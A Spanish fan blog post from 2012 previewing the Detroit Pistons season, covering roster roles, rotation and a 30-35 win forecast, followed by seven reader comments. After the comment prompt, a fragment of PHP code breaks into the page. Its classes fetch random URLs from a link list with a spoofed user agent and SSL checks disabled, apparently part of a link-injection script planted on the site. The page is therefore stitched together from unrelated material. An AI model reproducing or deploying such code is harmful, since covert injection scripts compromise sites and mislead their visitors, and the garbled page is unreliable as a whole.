Detroit Pistons: Año de transición

12 de October de 2012 por telekoman

Parece que el futuro se acerca a la ciudad de la Motown, pero este no tiene porque ser precisamente un futuro perfecto.

Los fans de Detroit tenemos bastante claro lo que podemos esperar de este año que está apunto de empezar.  El núcleo básico del equipo es joven y con talento suficiente como pensar en una temporada “relajada”, de transición y rodaje.  Rodney Stuckey,  Brandon Knight y Greg Monroe forman una base que podría llegar a ser importante en un par de años. Junto a ellos, veteranos como Tayshaun Prince, Jason Maxiell o Corey Maggette (omito voluntariamente a Villanueva) y rookies como Andre Drummond o Kyle Singler forman un bloque aparentemente sólido aunque algo falto de altura.

El equipo está construido en torno a la figura de Greg Monroe. El Center de 22 años afronta su tercera temporada con los galones bien afianzados sobre sus hombros y sabiendo que sus más de 15 puntos y casi 10 rebotes por partido están bien, pero que es posible dar aún más. Si los rumores son ciertos, durante el verano ha estado trabajando mucho y bien en sus capacidades ofensivas y en su capacidad de liderazgo. Este último punto puede ser clave en el rendimiento de Drummond en el medio plazo siempre que Monroe consiga hacerle madurar como jugador. Greg es el único interior que tiene el puesto asegurado y saldrá desde el inicio en todos los partidos, si bien alternará las posiciones de 4 y 5 dependiendo del jugador que le acompañe. Actuará de 4, posición que le viene mejor por tamaño pero no por velocidad de desplazamiento lateral, si a su lado está Drummond o el ruso Kravtsov, y de 5 si juega junto a Maxiell, Jerebko o Villanueva. El ruso ha impresionado mucho al entrenador Frank Lawrence, al resto de la plantilla y en general a los aficionados por su capacidad defensiva y ahora mismo está por delante de Drummond en la rotación. Esto puede cambiar a lo largo de la temporada pero hay que recordar que el rookie de Connecticut dejó la universidad con sólo un año cumplido y que en general está “poco hecho”. Puede convertirse en un coco defensivo pero deberá trabajar mucho su inexistente faceta ofensiva. 

El que más posibilidades tiene de empezar la temporada junto a Monroe es Maxiell que tan sólo ha tardado 8 años en decidirse a trabajar en serio (una de las cejas de Monroe es testigo directo de esto) y parece muy enchufado. Pero su falta de capacidad de ataque es más que evidente lo que lastra en exceso el juego del equipo. Terminó de titular la temporada pasada y parece que el entrenador quiere mantener esta dinámica. No estaría mal incluir al bueno de Jason en algún trade con algún contender que necesite defensa y obtener … lo que sea, mejor rondas que jugadores. La otra posibilidad es la de Jonas Jerebko. El sueco es un interior más que correcto que aporta un plus de energía muy importante para el equipo. El año pasado jugó minutos de 3 que este año es difícil que disfrute pero no creo que su aportación se reduzca mucho. ¿Hablamos de Villanueva? Francamente la pereza me invade. De los 6 interiores es el que menos capacidad defensiva tiene y no tiene ganas de mostrar su capacidad ofensiva, superior a varios de sus compañeros. Le quedan dos años de contrato a 8 kilos cada uno así que este curso le veo como la cheerleader más cara (y fea) de la plantilla. A lo mejor el año que viene, teniendo que ganarse un nuevo contrato vemos algo más de Charlie. En todo caso es un claro candidato a la amnistía.

Los otros dos pilares del equipo serán Rodney Stuckey y Brandon Knight. El primero afronta su quinta temporada dejando atrás un año de luces y sombras en el que mostró de nuevo trazas de poder hacer algo grande pero una gran inconsistencia. Mala combinación. Ocupará seguramente el puesto de Shooting Guard dejando la dirección pura a Knight. La posición de 2 le viene mejor ofensivamente que la de 1, pero sufrirá mucho en la defensa ante jugadores bastante más grandes que él. De todas maneras el equipo ataca mucho mejor con él en el campo como escolta. Knight ocupará el puesto de 1 durante esta temporada. Su año rookie no fue del todo bueno (terminó octavo en la carrera por el ROY) por lo que el trabajo que le queda por hacer será muy duro. Lo mejor del año pasado fue su fácil adaptación a la NBA y su tiro de 3 pero fracasó en la dirección. Queda por saber que porcentaje de culpa tiene el equipo en ese fracaso y que porcentaje hay que atribuirle directamente a él. Mejorará seguro durante este año. Will Bynum y Kim English quedan para el resto de minutos, si bien la tardía aparición de Johny Flynn puede modificar algo el reparto.

La posición más abarrotada es la de 3. Tayshaun Prince partirá de nuevo como titular, y van 10 temporadas seguidas. Este año debe demostrar que es realmente un veterano y ceder el liderazgo a los jóvenes. Su papel ya no puede ser el de mayor anotador de la plantilla, por lo que debe plantearse mejorar la mala selección de tiro del año anterior. Curiosamente su primer recambio no va a ser precisamente jovencito. Cory Maggette ha llegado al equipo en la misma operación que mandó a Ben Gordon a los Bobcats (tanta paz lleve como descanso deja el animalito). Las lesiones le han lastrado mucho y podremos considerar que su temporada es buena si cumple durante 20 minutos y consigue 11 o 12 puntos. Austin Daye, Kyle Singler y Khris Middleton completarán los minutos de 3. De ninguno se espera una temporada sobresaliente, pero tengo ganas de ver si el rodaje de Singler en Europa le ha servido de algo.

El equipo está por fin aprendiendo a defender mordiendo y espero que consiga evolucionar en ataque al tiempo que Knight va obteniendo experiencia.

Quinteto: Brandon Knight – Rodney Stuckey – Tayshaun Prince – Jason Maxiell – Greg Monroe
Sexto hombre: Kravtsov/Drummond

Pronóstico: 30-35 victorias, fuera de play-offs

Comenta

7 comentarios a esta entrada

  1. Esteban dice:
    #1

    es increible como joe dumars que fue GM del año y que se hablaba q era uno de los mejores de la historia pudo haberle errado tanto con iverson, gordon y villanueva

    el dia que firmo esos ultimso dos contratos, mato al equipo por el modico tiempo de 5 años, y la completo con la desmesurada renovacion de prince ¿que hace en este equipo?, y un contrato no tan malo pero tampoco tan merecido como el de stuckey

    con errores asi es muiy dificil

    me encanta MONROE, tiene pinta de crack enserio, y knight y stuckey no esta tan mal, si drummond cambia mi sensacion y se afianza como un pivot NBA (yo por lo que viste, le doy una carrera como la THEBBET), tienen cierto nucleo

    yo perderia todos todos los juegos con la ilusion de hacerme con el puesto 1 y ahi alegir un alero y completar el 5 inicial, joven y con potencial

    un alero del proximo draft? Shabazz Muhammed, no estaria nada mal no? con el, este equipo ya no seria nada malo

      Citar

  2. Txusma dice:
    #2

    Muy mal lo tiene que hacer Drummond para tener una carrera como la de Thabeet. Yo creo q le van a dar minutos (cosa q a Thabeet no le dieron nunca) lo que hará que Monroe juegue minutos de 4. Es un muy buen pasador así que esa pareja puede ser muy interesante a largo plazo.

      Citar

  3. Esteban dice:
    #3

    por lo que he visto de drummond es una bestia fisica y fuerte, salta y es algo agil, pero lo vi muy muy descordinado, con una mecanioca de tiro de amateur, e inteligente como un chico de 9 años

    ojala me equivoque

      Citar

  4. melo15 dice:
    #4

    Creo que se han movido muy bien estos Pistons y no me sorprenderia verlos en Playoffs en 2 años, el problema es que no veo a nadie capaz de guiarlos a mas, a menos que Drummond se transformase en lo que podria llegar a ser un center dominante, por fisico puede serlo pero tecnicamente deja mucho que desear.
    Lo unico que espero es que reciba minutos o no evolucionara, una pareja Monroe-Drummond seria letal, porque son justo el contrario, y si Monroe tiene problemas para defender a 4 pues para eso esta Drummond no?

      Citar

  5. portu dice:
    #5

    La evolució clave, como muy bien decía al final Telekoman, puede ser la de B. Knight. El año pasado jugó de manera muy diferente según avanzaba la temporada, con muchísimas pérdidas de balón al principio, pocas asistencias y algo más acertado en el 1×1 y en el tiro, creo q luego intentó mejorar el tema de las asistencias y perdió algo de su capacidad ofensiva individual, con algunos partidos donde sí estuvo muy acertado, pero más gracias a los triples. Este año creo q va a volver por la senda del final de temporada pasada, buscando ser más un base director q un anotador. Para ello necesita mejorar su juego, pero tb necesita tener al menos 2 buenos jugadores ofensivos al lado, es decir, necesita un Monroe más protagonista y un Stuckey sano todo el año y ya 100% adaptado al puesto q mejor le va, el de SG. Yo veo a casi todos buenos defensores, no mostrencos en defensa pq todos tienen limitaciones físicas, pero sí veo la implicación necesaria.
    Creo q globalmente van a mejorar y este año deberían al menos empezar a encajar lo 1 pueden ser 3 o 4 buenos mimbres, Drummond como center defensivo al lado de un 4 como Monroe, Kravtsov para entrar en esa rotación, igual q English y Singler por fuera. Con Middleton ni idea de qué esperar, pero de Daye, Villanueva, Maxiell, Jerebko o Prince yo ya no espero el nivel suficiente para q ayuden dentro de 2-3 temporadas q será el pico de esta franquicia.

      Citar

  6. GreenPride dice:
    #6

    Equipo con futuro pero creo que de momento sin mucho presente De la evolucion de su duo interior dependera donde se encuentren dentro de un par de años peeo de momemto creo que su maxima aspiración es coger experiencia e intentatr pescar en el proximo draft un alero de garantias para el futuro

      Citar

  7. txusma dice:
    #7

    Oye, parece que lo de Andre Drummond va en serio. Esa dupla Monroe-Drummond puede ser brutal a medio-largo plazo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>